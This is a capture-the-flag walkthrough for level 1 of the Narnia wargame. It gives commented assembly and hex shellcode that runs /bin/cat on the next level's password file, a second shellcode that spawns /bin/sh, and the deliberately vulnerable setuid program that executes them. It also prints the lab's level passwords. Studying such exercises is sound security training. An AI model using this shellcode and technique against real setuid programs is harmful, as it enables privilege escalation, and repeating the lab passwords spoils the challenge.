# Narnia wargame: Level 1


# cat mycat.asm
; mycat.asm -- NASM syntax, 32-bit x86, Linux int 0x80 system-call convention.
; Builds two NUL-terminated strings and an argv array on the stack (no data
; section, no labels), then issues system call 11 (execve on i386 Linux) so
; that /bin/cat is run with /etc/narnia_pass/narnia2 as its only argument.
; Register roles at the int 0x80:
;   eax = 11 (system-call number)
;   ebx = pointer to the program path string
;   ecx = pointer to argv  { path, file argument, NULL }
;   edx = pointer to envp  { NULL }
; Nothing follows the int 0x80 in this listing, so there is no handling for
; the case where the system call returns with an error.
BITS 32
xor eax,eax ; eax = 0
cdq ; sign-extend eax into edx, so edx = 0 as well
mov byte al,11 ; eax = 11; only AL is written, the upper bytes are still 0
push edx ; four zero bytes: NUL terminator for the first string
push long 0x7461632f ; bytes "/cat" in memory (dword is stored little-endian)
push long 0x6e69622f ; bytes "/bin" -> stack now reads "/bin/cat\0"
mov ebx,esp ; ebx -> "/bin/cat"
push edx ; NUL terminator for the second string
push long 0x3261696e ; bytes "nia2"
push long 0x72616e2f ; bytes "/nar"
push long 0x73736170 ; bytes "pass"
push long 0x5f61696e ; bytes "nia_"
push long 0x72616e2f ; bytes "/nar" (same dword as two pushes earlier)
push long 0x6374652f ; bytes "/etc" -> "/etc/narnia_pass/narnia2\0"
mov ecx,esp ; ecx -> "/etc/narnia_pass/narnia2" (temporary; becomes argv[1])
push edx ; NULL dword: terminates argv and doubles as the empty envp
mov edx,esp ; edx -> that NULL, i.e. envp = { NULL }
push ecx ; argv[1] = pointer to the file path
push ebx ; argv[0] = pointer to "/bin/cat"
mov ecx,esp ; ecx -> argv = { "/bin/cat", "/etc/narnia_pass/narnia2", NULL }
int 0x80 ; enter the kernel with eax/ebx/ecx/edx as set up above
# nasm -f elf mycat.asm && ld -o mycat mycat.o
# od2sc mycat
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x6e\x69\x61\x32\x68\x2f\x6e\x61\x72\x68\x70\x61\x73\x73\x68\x6e\x69\x61\x5f\x68\x2f\x6e\x61\x72\x68\x2f\x65\x74\x63\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80"

# ssh narnia1@narnia.labs.overthewire.org
narnia1@narnia.labs.overthewire.org's password:65666569646965646165

narnia1@melissa$ file /narnia/narnia1
/narnia/narnia1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia1@melissa$ cat /narnia/narnia1.c
#include <stdio.h>

/*
 * narnia1 challenge program (deliberately vulnerable training target).
 *
 * Reads the EGG environment variable and calls its contents as a function,
 * so whoever controls the process environment controls what it executes.
 * Returns 0 if the called code returns; exits with status 1 when EGG is
 * not set.
 *
 * NOTE(review): getenv() and exit() are used although only <stdio.h> is
 * included, so both are implicitly declared here.
 * NOTE(review): the call can only work if the memory holding the
 * environment string is executable -- presumably the binary is built
 * without a non-executable stack; confirm against the build flags.
 * Enforcing NX and never installing a program like this setuid (the
 * `file` output in the surrounding transcript reports it as setuid) are
 * the relevant mitigations.
 */
int main(){
        int (*ret)();   /* function pointer that will be aimed at the EGG string */

        /* Refuse to continue when the variable is missing. */
        if(getenv("EGG")==NULL){
                printf("Give me something to execute at the env-variable EGG\n");
                exit(1);
        }

        printf("Trying to execute EGG!\n");
        ret = getenv("EGG");    /* data pointer stored into a function pointer, unchecked */
        ret();                  /* control transfers into the environment string's bytes */

        return 0;
}
narnia1@melissa$ export  EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x6e\x69\x61\x32\x68\x2f\x6e\x61\x72\x68\x70\x61\x73\x73\x68\x6e\x69\x61\x5f\x68\x2f\x6e\x61\x72\x68\x2f\x65\x74\x63\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80"'`
narnia1@melissa$ /narnia/narnia1
Trying to execute EGG!
6e616972696570656375
narnia1@melissa$ export  EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
narnia1@melissa$ /narnia/narnia1
Trying to execute EGG!
$ /usr/bin/whoami
narnia2
$ /bin/cat /etc/narnia_pass/narnia2
6e616972696570656375
